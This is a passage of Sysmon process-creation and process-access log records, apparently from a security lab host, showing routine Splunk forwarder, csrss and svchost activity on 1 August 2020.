Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:43.539","SourceProcessGUID":"{41C8662E-21DF-5F25-0000-0010F62C0A00}","SourceProcessId":"2252","SourceThreadId":"3664","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":6572,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.071\r\nProcessGuid: {41C8662E-21E0-5F25-0000-0010B22E0A00}\r\nProcessId: 5048\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.071","ProcessGuid":"{41C8662E-21E0-5F25-0000-0010B22E0A00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6573,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-21E0-5F25-0000-0010B22E0A00}\r\nTargetProcessId: 5048\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-21E0-5F25-0000-0010B22E0A00}","TargetProcessId":"5048","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6574,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21E0-5F25-0000-0010B22E0A00}\r\nTargetProcessId: 5048\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21E0-5F25-0000-0010B22E0A00}","TargetProcessId":"5048","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6575,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6576,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6577,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6578,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:03:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6579,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:03:44.070\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:03:44.070","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:03:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
